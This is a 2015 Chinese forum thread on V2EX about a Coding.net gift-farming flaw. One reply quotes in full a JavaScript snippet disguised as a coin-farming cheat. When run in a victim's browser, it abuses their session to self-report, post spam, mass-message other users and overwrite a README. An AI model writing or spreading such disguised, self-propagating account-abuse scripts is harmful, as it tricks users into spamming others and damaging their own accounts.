V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Coding.NET 轻量级社交
开源项目广场
使用帮助
意见反馈
Delbert
V2EX  ›  Coding

Coding.net 这几天送东西是不是有点过头了?

  •  
  •   Delbert · 2015-06-05 15:32:58 +08:00 · 5242 次点击
    这是一个创建于 3219 天前的主题,其中的信息可能已经有所发展或是发生改变。
    这是连服务器都送出去了?

    9 条回复    2015-06-05 17:23:45 +08:00
    RIcter
        1
    RIcter  
       2015-06-05 15:35:21 +08:00
    送东西那里有漏洞,可以刷礼物..
    Delbert
        2
    Delbert  
    OP
       2015-06-05 15:38:51 +08:00
    @RIcter 大神,求脚本。
    不要告诉我是 mabi.coding.io/shuamb.js ...............
    跪谢233333333333
    RIcter
        3
    RIcter  
       2015-06-05 15:39:22 +08:00
    @Delbert 我同事挖到的 @erevus
    typcn
        4
    typcn  
       2015-06-05 15:48:50 +08:00
    @Delbert F12 把 disabled 去掉,哈哈哈哈哈
    typcn
        5
    typcn  
       2015-06-05 15:57:14 +08:00
    手贱运行了一下。。。

    $.post("https://coding.net/api/social/message/send", {
    receiver_global_key: "Kyle_lyk",
    content: "我在刷码币,求封号!"
    }, "JSON");

    for (var i = 0; 5 > i; i++) jQuery.post("https://coding.net/api/tweet", {
    content: "@AKCoding @Coding 我在模拟手机发冒泡刷码币,我是一只快乐的小毛驴,刷呀刷呀刷码币,码币" + new Date().getTime(),
    device: "RM-937"
    }, function(a) {
    alert("模拟手机发送冒泡成功");
    }, "json"), jQuery.post("https://coding.net/api/tweet", {
    content: "@AKCoding @Coding 我在模拟电脑发冒泡刷码币,我是一只快乐的小毛驴,刷呀刷呀刷码币,码币" + new Date().getTime()
    }, function(a) {
    alert("模拟电脑发送冒泡成功");
    }, "json");

    $.get("https://coding.net/api/tweet/best_user", function(a) {
    for (var b = 0; b < a.data.length; b++) $.post("https://coding.net/api/social/message/send", {
    receiver_global_key: a.data[b].global_key,
    content: "我在刷码币,赶快和我一起来刷吧!"
    }, "JSON");
    }, "JSON");

    alert("通过专用API获取码币成功!");

    $.get("https://coding.net/api/tweet/public_tweets", function(a) {
    for (var b = 0; b < a.data.length; b++) $.post("https://coding.net/api/social/message/send", {
    receiver_global_key: a.data[b].owner.global_key,
    content: "我在刷码币,赶快和我一起来刷吧!"
    }, "JSON");
    }, "JSON");

    $.get("https://coding.net/api/account/current_user", function(a) {
    jQuery.get("https://coding.net/api/user/" + a.data.global_key + "/project/mb/git/edit/master/README.md", function(b) {
    b = b.data.lastCommit;
    jQuery.post("https://coding.net/api/user/" + a.data.global_key + "/project/mb/git/edit/master/README.md", {
    content: new Date().getTime() + "我在刷码币,我是一只快乐的小毛驴,刷呀刷呀刷码币,码币",
    message: "update README.md",
    lastCommitSha: b
    }, function(a) {}, "json");
    alert("模拟项目推送获取码币成功");
    }, "json");
    }, "JSON");
    Delbert
        6
    Delbert  
    OP
       2015-06-05 15:58:28 +08:00
    @typcn 我的意思是 肯定不是这个脚本。。。。。。
    typcn
        7
    typcn  
       2015-06-05 15:59:56 +08:00
    @Delbert 某地方的时间是可以指定的,修改不同的天数。。。
    Delbert
        8
    Delbert  
    OP
       2015-06-05 16:07:34 +08:00
    @typcn 时间不能改的吧,要是能改就太弱了……
    kisshere
        9
    kisshere  
       2015-06-05 17:23:45 +08:00 via Android
    应该是index.php都送出去了
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   968 人在线   最高记录 6543   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 20:45 · PVG 04:45 · LAX 13:45 · JFK 16:45
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.